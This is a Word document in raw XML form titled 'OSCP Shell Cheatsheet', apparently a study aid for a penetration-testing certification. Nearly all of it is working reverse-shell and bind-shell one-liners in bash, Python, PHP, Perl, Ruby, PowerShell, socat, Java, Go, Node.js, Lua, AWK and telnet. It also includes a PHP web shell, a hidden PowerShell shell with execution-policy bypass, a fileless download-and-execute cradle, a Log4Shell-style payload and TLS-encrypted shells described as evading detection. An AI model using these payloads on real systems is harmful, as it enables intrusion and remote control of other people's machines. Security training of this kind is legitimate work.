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A1F"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t xml:space="preserve">OSCP Shell Cheatsheet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Reverse Shells  |  Bind Shells  |  Shell Upgrades</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E7D32" w:sz="12" w:space="6"/>
        </w:pBdr>
        <w:spacing w:before="0" w:after="300"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="777777"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Replace LHOST = your IP  |  LPORT = your listener port  |  RHOST/RPORT = target</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E7D32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1F3A1F"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Variable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7"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">LHOST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192.168.49.65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Your Kali / attack machine IP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7"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">LPORT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4444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Your listening port (start nc/ncat/socat here)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7"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">RHOST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192.168.1.100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Target machine IP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17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">RPORT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17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">4444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Bind shell listening port on target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120" w:after="12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</w:rPr>
        <w:t xml:space="preserve">[REVERSE]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Target connects back to you    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="F57F17"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">[BIND]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You connect to listener on target    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0D47A1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">[UPGRADE]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Shell stabilization</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="F9A825" w:sz="16" w:space="6"/>
        </w:pBdr>
        <w:shd w:fill="FFF8E1" w:val="clear"/>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="6D4C41"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Before catching a reverse shell, start your listener:  </w:t>
      </w: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nc -lvnp LPORT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1F3A1F"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Bash / sh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Bash TCP Reverse Shell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Opens /dev/tcp pseudo-device to connect back to attacker. Redirects stdin/stdout/stderr over the socket. Works on most Linux targets where bash is available.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bash -i &gt;&amp; /dev/tcp/LHOST/LPORT 0&gt;&amp;1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Bash TCP (alternate form)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Same as above but uses exec for the redirection — sometimes more reliable in restricted shells.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exec bash -i &amp;&gt;/dev/tcp/LHOST/LPORT &lt;&amp;1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sh /dev/tcp (POSIX)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Uses /bin/sh instead of bash. Useful when only POSIX sh is available.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/bin/sh -i &gt;&amp; /dev/tcp/LHOST/LPORT 0&gt;&amp;1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Bash UDP Reverse Shell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Same concept over UDP. Listener: nc -u -lvnp LPORT. Useful to bypass TCP-focused firewalls.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bash -i &gt;&amp; /dev/udp/LHOST/LPORT 0&gt;&amp;1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mkfifo Named Pipe Reverse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Creates a named pipe (FIFO) so nc can shuttle stdin/stdout bidirectionally. Very reliable when bash /dev/tcp is blocked.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rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2&gt;&amp;1 | nc LHOST LPORT &gt; /tmp/f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F57F17"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="yellow"/>
          <w:highlightCs w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">[BIND]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Bash Bind Shell (mkfifo)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Creates a listening shell on the target using mkfifo. Connect with: nc RHOST RPORT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rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2&gt;&amp;1 | nc -l RPORT &gt; /tmp/f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1F3A1F"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Python 3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Socket + dup2 + pty (Exploit Delivery — e.g. python3 47984.py)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Passed as shell argument to a Python exploit. Imports socket, os; connects to attacker; dup2 redirects fd 0/1/2; pty.spawn gives a proper PTY. Most stable Python reverse shell.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python3 47984.py RHOST 25 'python3 -c "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"LHOST\",LPORT));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty;pty.spawn(\"/bin/bash\")"'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Python3 Reverse Shell (direct exec)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Socket+dup2 run directly on target. No PTY — raw shell. Good for injection contexts.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python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("LHOST",LPORT));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'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Python3 Reverse Shell (pty spawn)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Adds pty.spawn for an interactive PTY — tab completion, CTRL+C, etc. More usable post-landing.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python3 -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("LHOST",LPORT));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/bash")'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Python2 Reverse Shell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Same socket+dup2 pattern for Python 2. Use when only py2 is available.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python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("LHOST",LPORT));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'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F57F17"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="yellow"/>
          <w:highlightCs w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">[BIND]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Python Bind Shell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Listens on RPORT on the target. Connect with: nc RHOST RPORT. Useful when you can execute code but have no outbound path.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python3 -c 'import socket,os,subprocess;s=socket.socket();s.bind(("0.0.0.0",RPORT));s.listen(1);c,a=s.accept();os.dup2(c.fileno(),0);os.dup2(c.fileno(),1);os.dup2(c.fileno(),2);subprocess.call(["/bin/sh","-i"])'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1F3A1F"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Netcat (nc)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nc -e Reverse Shell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Classic nc with -e flag (execute). Not available in OpenBSD nc or hardened distros.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nc LHOST LPORT -e /bin/sh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F57F17"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="yellow"/>
          <w:highlightCs w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">[BIND]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nc -e Bind Shell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Listens on target and executes /bin/sh when you connect. Connect with: nc RHOST RPORT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nc -lvnp RPORT -e /bin/sh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nc mkfifo Reverse (no -e)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Works with OpenBSD/hardened nc that lacks -e. Uses a named pipe for bidirectional flow.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rm -f /tmp/p; mkfifo /tmp/p; nc LHOST LPORT &lt; /tmp/p | /bin/sh &gt; /tmp/p 2&gt;&amp;1; rm /tmp/p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ncat SSL Reverse Shell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Ncat (from nmap) with SSL — encrypts shell traffic. Listener: ncat --ssl -lvnp LPORT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ncat --ssl LHOST LPORT -e /bin/sh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F57F17"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="yellow"/>
          <w:highlightCs w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">[BIND]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nc Bind Shell (mkfifo)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Bind shell without -e using mkfifo pipe trick.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rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2&gt;&amp;1 | nc -l RPORT &gt;/tmp/f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1F3A1F"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">PHP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PHP Reverse Shell (proc_open)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proc_open gives fine-grained control over stdin/stdout/stderr pipes. Reliable when exec/system aren't restricted.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php -r '$sock=fsockopen("LHOST",LPORT);$proc=proc_open("/bin/sh -i",array(0=&gt;$sock,1=&gt;$sock,2=&gt;$sock),$pipes);'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PHP One-liner Web Shell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Drop in a .php file on a web server. ?cmd=whoami runs commands. Use it to launch a full reverse shell.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&lt;?php system($_GET['cmd']); ?&gt;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PHP Pentestmonkey Shell (file)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The classic pentestmonkey PHP reverse shell. Edit $ip and $port, upload to web root, browse to it. Full TTY.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# Download from: https://github.com/pentestmonkey/php-reverse-shell</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E7D32" w:sz="4"/>
          <w:left w:val="single" w:color="2E7D32" w:sz="4"/>
          <w:right w:val="single" w:color="2E7D32" w:sz="4"/>
        </w:pBdr>
        <w:shd w:fill="1E2A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# Edit $ip and $port at top of file, upload, browse to it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F57F17"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="yellow"/>
          <w:highlightCs w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">[BIND]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PHP Bind Shell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Opens a socket on the target listening on RPORT. Connect with: nc RHOST RPORT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php -r '$s=socket_create(AF_INET,SOCK_STREAM,SOL_TCP);socket_bind($s,"0.0.0.0",RPORT);socket_listen($s,1);$c=socket_accept($s);while(($buf=socket_read($c,1024))!=false){$out=shell_exec($buf);socket_write($c,$out,strlen($out));}'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1F3A1F"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Perl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Perl Reverse Shell (Linux)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Perl socket reverse shell. Opens TCP socket, dups file handles to socket fd, execs /bin/sh. Available on many Unix systems.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perl -e 'use Socket;$i="LHOST";$p=LPORT;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));connect(S,sockaddr_in($p,inet_aton($i)));open(STDIN,"&gt;&amp;S");open(STDOUT,"&gt;&amp;S");open(STDERR,"&gt;&amp;S");exec("/bin/sh -i");'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Perl Reverse Shell (Windows)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Perl reverse shell adapted for Windows using cmd.exe.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perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"LHOST:LPORT");STDIN-&gt;fdopen($c,r);$~-&gt;fdopen($c,w);system$_ while&lt;&gt;;'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F57F17"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="yellow"/>
          <w:highlightCs w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">[BIND]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Perl Bind Shell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Binds a shell to RPORT on the target. Connect with: nc RHOST RPORT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perl -e 'use Socket;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));bind(S,sockaddr_in(RPORT,INADDR_ANY));listen(S,SOMAXCONN);accept(C,S);open(STDIN,"&gt;&amp;C");open(STDOUT,"&gt;&amp;C");open(STDERR,"&gt;&amp;C");exec("/bin/sh -i");'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1F3A1F"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Ruby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Ruby Reverse Shell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Uses Ruby's TCPSocket class. Spawns /bin/sh and redirects IO to socket. Common on web servers.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ruby -rsocket -e 'exit if fork;c=TCPSocket.new("LHOST","LPORT");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'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Ruby Reverse Shell (simple)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Simpler Ruby reverse shell using shell fd redirection directly.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ruby -rsocket -e 's=TCPSocket.new("LHOST",LPORT);`/bin/sh -i &lt;&amp;#{s.fileno} &gt;&amp;#{s.fileno} 2&gt;&amp;#{s.fileno}`'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F57F17"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="yellow"/>
          <w:highlightCs w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">[BIND]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Ruby Bind Shell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Creates a TCP server on target at RPORT. Connect with: nc RHOST RPORT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ruby -rsocket -e 's=TCPServer.new(RPORT);c=s.accept;while cmd=c.gets;IO.popen(cmd,"r"){|io|c.print io.read}end'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1F3A1F"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">PowerShell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PowerShell TCP Reverse Shell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Pure PowerShell: opens TCP socket, reads commands via StreamReader, sends output back in a loop. Core Windows attack shell.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powershell -NoP -NonI -W Hidden -Exec Bypass -c "$c=New-Object System.Net.Sockets.TCPClient('LHOST',LPORT);$s=$c.GetStream();[byte[]]$b=0..65535|%{0};while(($i=$s.Read($b,0,$b.Length)) -ne 0){$d=(New-Object -TypeName System.Text.ASCIIEncoding).GetString($b,0,$i);$r=(iex $d 2&gt;&amp;1|Out-String);$rb=[System.Text.Encoding]::ASCII.GetBytes($r);$s.Write($rb,0,$rb.Length);$s.Flush()};$c.Close()"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PowerShell Base64 Encoded Payload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Encodes payload as Base64 to bypass command-line detection and quoting issues. Generate: [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes('&lt;cmd&gt;'))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powershell -enc &lt;BASE64_ENCODED_PAYLOAD&gt;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F57F17"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="yellow"/>
          <w:highlightCs w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">[BIND]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PowerShell Bind Shell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Creates a TCPListener on RPORT. Accepts connection and pipes commands to Invoke-Expression. Connect with: nc RHOST RPORT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powershell -c "$l=New-Object System.Net.Sockets.TcpListener('0.0.0.0',RPORT);$l.Start();$c=$l.AcceptTcpClient();$s=$c.GetStream();[byte[]]$b=0..65535|%{0};while(($i=$s.Read($b,0,$b.Length)) -ne 0){$d=([text.encoding]::ASCII).GetString($b,0,$i);$r=(iex $d 2&gt;&amp;1|Out-String);$rb=[text.encoding]::ASCII.GetBytes($r);$s.Write($rb,0,$rb.Length)};$c.Close();$l.Stop()"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PowerShell Download Cradle + Nishang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Downloads and executes Invoke-PowerShellTcp from Nishang in memory. Fileless — nothing written to disk.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powershell IEX(New-Object Net.WebClient).DownloadString('http://LHOST/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress LHOST -Port LPORT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1F3A1F"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Socat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Socat Reverse Shell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Socat EXEC wires shell to TCP. Listener: socat file:`tty`,raw,echo=0 tcp-listen:LPORT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socat TCP:LHOST:LPORT EXEC:/bin/sh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Socat PTY Reverse Shell (best quality)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Full PTY shell — arrows, tab completion, CTRL+C all work. The gold standard when socat is available. Listener: socat file:`tty`,raw,echo=0 tcp-listen:LPORT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socat TCP:LHOST:LPORT EXEC:'/bin/bash',pty,stderr,setsid,sigint,sane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F57F17"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="yellow"/>
          <w:highlightCs w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">[BIND]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Socat Bind Shell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Binds shell to RPORT. Connect with: socat - TCP:RHOST:RPORT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socat TCP-LISTEN:RPORT,reuseaddr,fork EXEC:/bin/sh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Socat SSL Encrypted Reverse Shell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TLS-encrypted shell — evades DPI/IDS. Generate cert: openssl req -newkey rsa:2048 -nodes -x509 -out shell.pem -keyout shell.pem. Listener: socat OPENSSL-LISTEN:LPORT,cert=shell.pem,verify=0 FILE:`tty`,raw,echo=0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socat OPENSSL:LHOST:LPORT,verify=0 EXEC:'/bin/bash',pty,stderr,setsid,sigint,sane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1F3A1F"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Java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Java Reverse Shell (Runtime.exec)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Uses Runtime.exec() with a string array to avoid shell escaping. Connects back over TCP and wires stdin/stdout/stderr to socket streams.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Runtime r=Runtime.getRuntime();</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="2E7D32" w:sz="4"/>
          <w:right w:val="single" w:color="2E7D32" w:sz="4"/>
        </w:pBdr>
        <w:shd w:fill="1E2A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Process p=r.exec(new String[]{"/bin/bash","-c",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="2E7D32" w:sz="4"/>
          <w:right w:val="single" w:color="2E7D32" w:sz="4"/>
        </w:pBdr>
        <w:shd w:fill="1E2A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  "exec 5&lt;&gt;/dev/tcp/LHOST/LPORT;cat &lt;&amp;5 | while read line; do $line 2&gt;&amp;5 &gt;&amp;5; done"});</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E7D32" w:sz="4"/>
          <w:left w:val="single" w:color="2E7D32" w:sz="4"/>
          <w:right w:val="single" w:color="2E7D32" w:sz="4"/>
        </w:pBdr>
        <w:shd w:fill="1E2A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p.waitFor();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Java Log4Shell-style (Base64)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Compact form often used when injecting via Log4Shell (CVE-2021-44228) or other deserialization vulnerabilities.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Runtime.getRuntime().exec("bash -c {echo,BASE64_PAYLOAD}|{base64,-d}|bash")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1F3A1F"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Go (Golang)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Go Reverse Shell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Compiled Go reverse shell. Cross-compile a static binary: GOOS=linux GOARCH=amd64 go build. Useful when target has no scripting runtimes.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package main</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="2E7D32" w:sz="4"/>
          <w:right w:val="single" w:color="2E7D32" w:sz="4"/>
        </w:pBdr>
        <w:shd w:fill="1E2A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import ("net"; "os/exec")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="2E7D32" w:sz="4"/>
          <w:right w:val="single" w:color="2E7D32" w:sz="4"/>
        </w:pBdr>
        <w:shd w:fill="1E2A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func main() {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="2E7D32" w:sz="4"/>
          <w:right w:val="single" w:color="2E7D32" w:sz="4"/>
        </w:pBdr>
        <w:shd w:fill="1E2A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  c, _ := net.Dial("tcp", "LHOST:LPORT")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="2E7D32" w:sz="4"/>
          <w:right w:val="single" w:color="2E7D32" w:sz="4"/>
        </w:pBdr>
        <w:shd w:fill="1E2A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  cmd := exec.Command("/bin/sh")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="2E7D32" w:sz="4"/>
          <w:right w:val="single" w:color="2E7D32" w:sz="4"/>
        </w:pBdr>
        <w:shd w:fill="1E2A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  cmd.Stdin = c; cmd.Stdout = c; cmd.Stderr = c</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="2E7D32" w:sz="4"/>
          <w:right w:val="single" w:color="2E7D32" w:sz="4"/>
        </w:pBdr>
        <w:shd w:fill="1E2A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  cmd.Run()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E7D32" w:sz="4"/>
          <w:left w:val="single" w:color="2E7D32" w:sz="4"/>
          <w:right w:val="single" w:color="2E7D32" w:sz="4"/>
        </w:pBdr>
        <w:shd w:fill="1E2A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}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1F3A1F"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Node.js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Node.js Reverse Shell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Uses net.Socket and child_process.spawn. Useful on web servers running Node (Express etc.) or when JS is the only runtime.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node -e '(function(){var n=require("net"),s=require("child_process").spawn("/bin/sh",[]);var c=n.connect(LPORT,"LHOST",function(){c.pipe(s.stdin);s.stdout.pipe(c);s.stderr.pipe(c);});})();'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1F3A1F"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Lua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Lua Reverse Shell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Useful on embedded devices or when Lua is the only interpreter (e.g., OpenWRT routers, game servers).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lua -e "require('socket');c=require('socket').tcp();c:connect('LHOST','LPORT');while true do local r,x=c:receive();local f=io.popen(r,'r');local s=f:read('*a');f:close();c:send(s);end;c:close();"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1F3A1F"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">AWK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AWK Reverse Shell (gawk)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Surprisingly useful when gawk is on the system but other interpreters are stripped. Uses /inet/tcp to open a socket.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awk 'BEGIN{s="/inet/tcp/0/LHOST/LPORT";for(;s|&amp;getline c;close(c))while(c|getline)print|&amp;s;close(s)}'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1F3A1F"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Telnet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1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="green"/>
          <w:highlightCs w:val="green"/>
        </w:rPr>
        <w:t xml:space="preserve">[REVERSE]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Telnet Two-Connection Reverse Shell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Opens two telnet connections: one for stdin, one for stdout/stderr. Requires two listeners: nc -lvnp LPORT and nc -lvnp LPORT2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telnet LHOST LPORT | /bin/bash | telnet LHOST LPORT2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D32" w:sz="8" w:space="4"/>
        </w:pBdr>
        <w:spacing w:before="300" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3A1F"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Shell Upgrade &amp; Stabilization</w:t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0D47A1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="cyan"/>
          <w:highlightCs w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve">[UPGRADE]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Python PTY Upgrade (Step 1)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After catching a dumb shell in nc, run this first to get a pseudo-terminal. Enables CTRL+C without killing the shell.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python3 -c 'import pty;pty.spawn("/bin/bash")'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0D47A1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="cyan"/>
          <w:highlightCs w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve">[UPGRADE]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Full TTY Upgrade via stty (Steps 2-5)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After pty.spawn, background with CTRL+Z, run stty on local machine, then fg. Gives fully interactive shell with proper sizing.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# Step 1 — in the dumb shell:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="2E7D32" w:sz="4"/>
          <w:right w:val="single" w:color="2E7D32" w:sz="4"/>
        </w:pBdr>
        <w:shd w:fill="1E2A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python3 -c 'import pty;pty.spawn("/bin/bash")'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="2E7D32" w:sz="4"/>
          <w:right w:val="single" w:color="2E7D32" w:sz="4"/>
        </w:pBdr>
        <w:shd w:fill="1E2A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 </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="2E7D32" w:sz="4"/>
          <w:right w:val="single" w:color="2E7D32" w:sz="4"/>
        </w:pBdr>
        <w:shd w:fill="1E2A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# Step 2 — CTRL+Z to background the nc session</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="2E7D32" w:sz="4"/>
          <w:right w:val="single" w:color="2E7D32" w:sz="4"/>
        </w:pBdr>
        <w:shd w:fill="1E2A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 </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="2E7D32" w:sz="4"/>
          <w:right w:val="single" w:color="2E7D32" w:sz="4"/>
        </w:pBdr>
        <w:shd w:fill="1E2A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# Step 3 — on YOUR local machine:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="2E7D32" w:sz="4"/>
          <w:right w:val="single" w:color="2E7D32" w:sz="4"/>
        </w:pBdr>
        <w:shd w:fill="1E2A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stty raw -echo; fg</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="2E7D32" w:sz="4"/>
          <w:right w:val="single" w:color="2E7D32" w:sz="4"/>
        </w:pBdr>
        <w:shd w:fill="1E2A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 </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="2E7D32" w:sz="4"/>
          <w:right w:val="single" w:color="2E7D32" w:sz="4"/>
        </w:pBdr>
        <w:shd w:fill="1E2A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# Step 4 — back in the shell:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="2E7D32" w:sz="4"/>
          <w:right w:val="single" w:color="2E7D32" w:sz="4"/>
        </w:pBdr>
        <w:shd w:fill="1E2A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reset</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="2E7D32" w:sz="4"/>
          <w:right w:val="single" w:color="2E7D32" w:sz="4"/>
        </w:pBdr>
        <w:shd w:fill="1E2A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export TERM=xterm</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="2E7D32" w:sz="4"/>
          <w:right w:val="single" w:color="2E7D32" w:sz="4"/>
        </w:pBdr>
        <w:shd w:fill="1E2A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export SHELL=/bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E7D32" w:sz="4"/>
          <w:left w:val="single" w:color="2E7D32" w:sz="4"/>
          <w:right w:val="single" w:color="2E7D32" w:sz="4"/>
        </w:pBdr>
        <w:shd w:fill="1E2A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stty rows 38 cols 157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0D47A1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="cyan"/>
          <w:highlightCs w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve">[UPGRADE]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script Upgrade (no Python needed)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Alternative to Python pty when Python is missing. Works on most Unix systems.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script /dev/null -c bash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0D47A1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="cyan"/>
          <w:highlightCs w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve">[UPGRADE]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rlwrap for Windows Shells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Wraps nc with readline — gives arrow key history for cmd/PowerShell shells. Run on your attack machine.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rlwrap nc -lvnp LPORT</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0D47A1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="cyan"/>
          <w:highlightCs w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve">[UPGRADE]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Upgrade to Meterpreter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From msfconsole sessions, upgrade a basic shell to full Meterpreter in-place.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="2E7D32" w:sz="4"/>
          <w:left w:val="single" w:color="2E7D32" w:sz="4"/>
          <w:right w:val="single" w:color="2E7D32" w:sz="4"/>
        </w:pBdr>
        <w:shd w:fill="1E2A1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="100"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="90EE90"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">sessions -u &lt;SESSION_ID&gt;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OSCP Shell Cheatsheet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3A1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D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2026-03-24T18:10:53.296Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-03-24T18:10:53.297Z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